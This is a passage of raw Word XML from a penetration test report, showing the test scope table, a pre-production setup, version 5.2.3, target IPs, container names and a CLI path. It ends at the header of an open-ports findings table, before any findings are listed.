            </w:pPr>
            <w:r>
              <w:t>No web application developed for the product</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="3C44BA97" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F70EF35" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A95B4CC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Out of Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C45C935" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>No Rest APIs developed for the product</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="64EA6763" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33B6FF82" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E74F11A" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>In-Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="375221E0" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="5518438A" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F8D3914" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Mobile</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37D36E43" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Out of Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4539CA72" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>No mobile application developed for the product</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="0585D73E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EE3F3F4" w14:textId="6B8244E2" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Thick</w:t>
            </w:r>
            <w:r w:rsidR="00C558AF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Client</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A12A3EB" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Out of Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="282744C4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Application is web based and no thick client involved. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="2B1B310B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A9F164C" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Container</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44276B54" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>In-Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="374D49F6" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="044C6EFE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D354232" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F3951C8" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>In-Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1666" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2503226D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="034AAD04" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DC2268" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="_Toc200562830"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Setup Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w14:paraId="3220D337" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The Pen Test was performed on the Network, Containers/PODs and CLI hosted on a Pre-Production environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3053B0E2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc200562831"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Build/Version</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="15B5A805" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The Pen Test was performed on the version 5.2.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FB7A17" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68DD1BA8" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc200562832"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Network and System Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="057AF8A4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>The Pen Test was performed on the below domain/IP(s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A161AD" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Public IP Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D093C" w14:textId="219CD17F" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="005260EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>9.114.12.78</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DC7FF0B" w14:textId="181DB86D" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="005260EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>9.114.12.79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8FFDF9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc200562833"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Container/PODs Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="5B0EFD0B" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="005260EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>utilityBareMetal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-official</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="690E62B0" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="005260EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>utilityBareMetal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>rcl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-official</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67ECF604" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000" w:rsidP="005260EA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>utilityBareMetal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>deploygui</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005260EA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-official</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A6EFDE" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc200562834"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>CLI Details</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="074CC728" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="600"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>lpp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>mmfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>essctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1D508DA3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="36567929" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading1"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc200562835"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DETAILED PEN FINDINGS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="51A11C75" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc199711434"/>
      <w:bookmarkStart w:id="19" w:name="_Toc200562836"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="0077B3"/>
          <w:sz w:val="40"/>
        </w:rPr>
        <w:t>Network Security Vulnerability</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w14:paraId="2CCD84AE" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="00B25578">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc199711435"/>
      <w:bookmarkStart w:id="21" w:name="_Toc200562837"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Public Target Systems open ports identified during network mapping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9400" w:type="dxa"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3133"/>
        <w:gridCol w:w="3133"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B25578" w14:paraId="485E65F1" w14:textId="77777777" w:rsidTr="00132DA3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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67C852" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F7CEC13" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3133" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1679592A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SERVICE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B25578" w14:paraId="6933BDD9" w14:textId="77777777" w:rsidTr="00132DA3">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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79A58A" w14:textId="77777777" w:rsidR="00B25578" w:rsidRDefault="00B25578" w:rsidP="0035444C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
